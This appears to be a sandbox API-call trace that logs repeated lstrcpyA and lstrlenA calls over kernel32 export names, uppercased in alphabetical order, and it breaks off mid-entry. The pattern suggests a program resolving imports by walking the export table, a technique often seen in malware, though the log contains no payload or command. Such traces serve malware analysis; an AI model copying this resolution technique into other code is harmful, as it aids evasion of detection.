[0079.295] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0079.295] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0079.295] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0079.295] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0079.295] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0079.295] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0079.295] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0079.295] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0079.295] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0079.295] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0079.295] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0079.295] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0079.295] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0079.295] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0079.295] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0079.295] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0079.295] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0079.295] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0079.295] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0079.296] lstrlenA (lpString="BEEP") returned 4 [0079.296] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0079.296] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0079.296] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0079.296] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0079.296] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0079.296] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0079.296] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0079.296] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0079.296] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0079.296] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0079.296] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0079.296] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0079.296] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0079.296] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0079.296] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0079.296] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0079.296] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0079.296] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0079.296] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0079.296] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0079.296] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0079.296] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0079.296] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0079.296] lstrlenA (lpString="CANCELIO") returned 8 [0079.296] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0079.296] lstrlenA (lpString="CANCELIOEX") returned 10 [0079.296] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0079.296] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0079.296] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0079.296] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0079.296] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0079.296] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0079.296] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0079.296] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0079.297] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0079.297] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0079.297] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0079.297] lstrlenA (lpString="CHECKELEVATION") returned 14 [0079.297] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0079.297] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0079.297] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0079.297] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0079.297] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0079.297] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0079.297] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0079.297] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0079.297] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0079.297] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0079.297] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0079.297] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0079.297] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0079.297] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0079.297] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0079.297] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0079.297] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0079.297] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0079.297] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0079.297] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0079.297] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0079.297] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0079.297] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0079.297] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0079.297] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0079.297] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0079.297] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0079.297] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0079.297] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0079.297] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0079.297] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0079.297] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0079.297] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0079.298] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0079.298] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0079.298] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0079.298] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0079.298] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0079.298] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0079.298] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0079.298] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0079.298] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0079.298] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0079.298] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0079.298] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0079.298] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0079.298] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0079.298] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0079.298] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0079.298] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0079.298] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0079.298] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0079.298] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0079.298] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0079.298] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0079.298] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0079.298] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0079.298] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0079.298] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0079.298] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0079.298] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0079.298] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0079.298] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0079.298] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0079.298] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0079.298] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0079.298] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0079.298] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0079.298] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0079.298] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0079.299] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0079.299] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0079.299] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0079.299] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0079.299] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0079.299] lstrlenA (lpString="COPYCONTEXT") returned 11 [0079.299] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0079.299] lstrlenA (lpString="COPYFILEA") returned 9 [0079.299] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0079.299] lstrlenA (lpString="COPYFILEEXA") returned 11 [0079.299] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0079.299] lstrlenA (lpString="COPYFILEEXW") returned 11 [0079.299] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0079.299] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0079.299] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0079.299] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0079.299] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0079.299] lstrlenA (lpString="COPYFILEW") returned 9 [0079.299] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0079.299] lstrlenA (lpString="COPYLZFILE") returned 10 [0079.299] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0079.299] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0079.299] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0079.299] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0079.299] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0079.299] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0079.299] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0079.299] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0079.299] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0079.299] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0079.299] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0079.299] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0079.299] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0079.299] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0079.299] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0079.299] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0079.299] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0079.299] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0079.300] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0079.300] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0079.300] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0079.300] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0079.300] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0079.300] lstrlenA (lpString="CREATEEVENTA") returned 12 [0079.300] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0079.300] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0079.300] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0079.300] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0079.300] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0079.300] lstrlenA (lpString="CREATEEVENTW") returned 12 [0079.300] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0079.300] lstrlenA (lpString="CREATEFIBER") returned 11 [0079.300] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0079.300] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0079.300] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0079.300] lstrlenA (lpString="CREATEFILEA") returned 11 [0079.300] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0079.300] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0079.300] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0079.300] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0079.300] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0079.300] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0079.300] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0079.300] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0079.300] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0079.300] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0079.300] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0079.300] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0079.300] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0079.300] lstrlenA (lpString="CREATEFILEW") returned 11 [0079.300] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0079.300] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0079.300] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0079.301] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0079.301] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0079.301] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0079.301] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0079.301] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0079.301] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0079.301] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0079.301] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0079.301] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0079.301] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0079.301] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0079.301] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0079.301] lstrlenA (lpString="CREATEJOBSET") returned 12 [0079.301] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0079.301] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0079.301] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0079.301] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0079.301] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0079.301] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0079.301] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0079.301] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0079.301] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0079.301] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0079.301] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0079.301] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0079.301] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0079.301] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0079.301] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0079.301] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0079.301] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0079.301] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0079.301] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0079.301] lstrlenA (lpString="CREATEPIPE") returned 10 [0079.301] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0079.301] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0079.301] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0079.302] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0079.302] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0079.302] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0079.302] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0079.302] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0079.302] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0079.302] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0079.302] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0079.302] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0079.302] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0079.302] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0079.302] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0079.302] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0079.302] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0079.302] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0079.302] lstrcpyA (in: lpString1=0x3f2c7fc, 